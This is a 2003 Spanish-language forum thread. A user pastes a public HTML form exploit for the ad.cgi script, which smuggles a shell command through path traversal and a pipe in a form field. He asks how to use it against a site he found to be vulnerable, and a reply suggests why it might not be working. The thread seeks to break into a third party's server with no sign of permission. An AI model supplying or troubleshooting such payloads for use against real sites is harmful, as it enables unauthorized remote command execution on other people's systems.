PDA

Ver la versión completa : ¿Como aplico un exploit para el script ad.cgi?



smitter
15-09-2003, 19:07
He encontrado una dirección con la vulnerabilidad ad.cgi, que según parece permite a un intruso ejecutar comandos remotos.
Tambien tengo (creo), el exploit, para aplicarlo, pero no sé como debo hacerlo, y estoy deseando poder aprender.
Según pone en la página
http://www.securityfocus.com/bid/2103
el exploit es este:

<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
<input type=submit value=run>
</form>
</html>

Ahora bien, ¿Que hago con el?
Lo he ejecutado como html, sustituyendo www.conservatives.net/someplace/ad.cgi
por www.webdelfallo.com/ad.cgi y no consigo nada más que me responda 404 error.
¿Cómo se aplica el exploit para poder ejecutar comandos?
Saluditos.

jocanor
14-10-2003, 20:26
esto parece bien simple...lo k io creo es k la pagina no es vulnerable o bien tmb podria ser que escribieras mal agun dato en el exploit, por otro lado tmb seria interesante saber si es k puedes ver el resultado por el navegador, por k es posible k tu ejecutes ese comando (ping) pero k no lo veas.